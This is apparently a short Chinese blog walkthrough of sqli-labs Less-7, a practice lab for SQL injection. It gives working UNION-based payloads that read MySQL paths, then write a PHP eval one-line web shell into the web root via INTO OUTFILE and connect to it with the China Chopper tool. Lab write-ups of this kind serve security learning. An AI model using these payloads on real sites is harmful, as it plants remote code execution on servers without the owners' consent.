SQLI DUMB SERIES-7 随笔 第1张

(1)查看PHP源代码

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

SQLI DUMB SERIES-7 随笔 第2张

可以看见输入的id被一对单引号和两对圆括号包围

(2)根据提示:Dump into Outfile可知,此次攻击需要导出文件

(3)在第一关获取

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

 

?id=2' union select 1,@@datadir,@@basedir --+

 

SQLI DUMB SERIES-7 随笔 第3张

(4)修改MySql配置,以让能在D盘写入文件(MySQL->my.ini)

SQLI DUMB SERIES-7 随笔 第4张

(5)payload如下

?id=1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\1234.php' --+

 SQLI DUMB SERIES-7 随笔 第5张

尽管显示错误,但在所写目录里有已经写好了文件

SQLI DUMB SERIES-7 随笔 第6张

(6)运行中国菜刀

SQLI DUMB SERIES-7 随笔 第7张

SQLI DUMB SERIES-7 随笔 第8张

至此,攻击完成!

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄